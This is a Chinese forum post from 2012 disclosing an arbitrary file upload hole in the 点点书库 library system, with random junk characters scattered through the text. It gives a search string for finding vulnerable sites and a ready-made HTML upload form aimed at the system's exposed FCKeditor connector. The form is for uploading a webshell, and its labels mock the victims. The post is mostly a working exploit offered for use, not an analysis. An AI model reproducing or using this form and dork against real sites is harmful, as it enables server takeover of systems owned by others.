主题:图书馆系统任意文件上传漏洞
5 ^7 ^2 f o% w0 ~4 e: t. K 作者:冰锋刺客
$ s- _/ F q% } 厂商:点击书(dianjishu.com)- D; ^: d4 o- m u/ ?3 X
日期:2012-6-213 s# S4 o- \0 \, ]9 M& l% [
: ]( h6 Z1 R4 r# Z
I 概述
0 e3 `2 b, l% d" K8 U o 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
! t% M& ~& M! D5 O II 简介4 c8 ~8 u% ? I: n5 k
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
1 H! s* l! O" y4 |8 |5 V7 G6 a5 g 补充一个漏洞& k& p8 M R9 m7 T( e
<form id="frmUpload" enctype="multipart/form-data"# y* c5 C/ T3 K
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
' z8 f* Z2 J/ d9 Q! s7 z <input id="btnUpload" type="submit" value="操翻他">
6 |- {3 Q7 K3 V# U </form>3 L" C! e; z: c. l
你们懂的$ L! I9 ]+ s8 m' A n
那傻逼提供还需要改包.
q; I3 s& Y7 s+ k1 f 自己看了下源代码发现fckeditor+ `' b+ S& N( J" D0 T
直接秒杀( l0 q! ]! H/ f% p7 z
|
发表于 2012-9-10 21:20:59
收藏
支持
反对